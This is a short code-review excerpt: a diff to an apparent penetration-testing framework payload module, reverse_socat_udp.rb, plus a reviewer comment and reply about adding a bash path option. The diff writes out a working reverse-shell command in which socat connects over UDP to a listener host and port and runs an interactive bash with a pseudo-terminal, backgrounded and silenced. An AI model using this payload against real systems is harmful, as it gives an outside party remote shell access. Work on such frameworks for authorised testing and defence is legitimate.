modules/payloads/singles/cmd/unix/reverse_socat_udp.rb

```diff
@@ -43,7 +48,7 @@ def generate(_opts = {})
   # Returns the command string to use for execution
   #
   def command_string
-    "socat udp-connect:#{datastore['LHOST']}:#{datastore['LPORT']} exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &"
+    "#{datastore['SocatPath']} udp-connect:#{datastore['LHOST']}:#{datastore['LPORT']} exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &"
```

Comment:
May need to add in the path to bash as an option here?

Reply:
I don't think it is needed but if you think it is necessary will add the option.